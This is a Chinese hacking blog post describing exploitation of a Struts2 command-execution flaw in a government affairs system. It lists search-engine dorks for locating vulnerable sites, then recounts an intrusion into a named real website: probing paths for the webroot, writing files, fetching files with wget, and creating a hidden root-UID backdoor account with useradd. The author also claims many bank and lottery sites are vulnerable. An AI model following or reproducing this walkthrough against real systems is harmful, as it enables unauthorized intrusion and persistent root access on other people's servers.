我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息某政府政务管理系统通用Struts2漏洞
某政府政务管理系统通用Struts2漏洞
9030
1推荐
0评论

谷歌关键字:inurl:common/common_info.action?wid=


Inurl:index.action


Inurl:商城.achtion (商城比较多)


Inurl:index.achtion 标题:apache struts2


Inurl:action?id=

某政府政务管理系统通用Struts2漏洞

没有NB的关键字 只有爱想的脑袋


关键字不唯一可能你多想想就能想出更牛的关键字


就开始利用吧

某政府政务管理系统通用Struts2漏洞

某政府政务管理系统通用Struts2漏洞

Struts2这个漏洞很多大站都存在 比如这个香港电视台的

不过这个执行命令卡 我就换个搞过的吧 那样方便演示

某政府政务管理系统通用Struts2漏洞

一小站 http://www.laipin.com/


这个漏洞一般都是阿帕奇 linux的


所以我们直接读阿帕奇的配置文件我们可以直接用find 命令


这样就会出现 那我们随便读个看看

/home/httpd

读了后发现这2都是错误的也就是都错误的


不过我们有强大的 find的命令


找这个找了一会 不过突然想到了 robots.txt

于是我

然后利用cat 一个一个去读 不过运气好
/usr/local/bakresin4/webapps/laipin/robots.txt
/usr/local/webapps/laipin/robots.txt
/usr/local/resin4/webapps/laipin/robots.txt
/usr/local/resin3/webapps/laipin/robots.txt
/usr/local/bak-resin4-bak/webapps/laipin/robots.txt
/var/laipin/robots.txt
/home/ftpfile/laipin/robots.txt
/home/ftpfile/lp/robots.txt
/home/httpd/laipin/robots.txt
/home/httpd/laipin2/robots.txt

第2个就是正确的 不过我全部读完了 确定就一个和网站的文件是匹配的

既然找到了根目录


就想 写文件呀


我用了


Echo bingdao test > /usr/local/webapps/laipin/1.txt (不成功)
Vi /usr/local/webapps/laipin/1.txt (不成功)
Touch /usr/local/webapps/laipin/1.txt (成功 但无法写入内容)
Mkdir /usr/local/webapps/laipin/123/ (成功 但无内容)

我后来仔细的想了想 也证实了 是由于cd命令执行不成功


但不明确是 不成功 还是无效果(好吧 没什么区别)


不过突然记起来了 wooyun一牛提交过某个远程代码执行漏洞


看了一下他的细节 发现是用的 wget 下载命令进行添加文件

下载成功后 发现不在根目录


于是 mv 移动到根目录

成功 不过发现了一件蛋疼的事 不解析

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p bingdao

用户也能添加成功


目测工具的危害性,而且目前国内好多银行网站及涉密的网站,彩票平台都存在漏洞


这篇文章也就到这了


全文没什么亮点 只是一种利用记录。。

这东西 有时运气好 渗透时就能秒杀... 平常也可以练下linux命令什么的还是不错

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415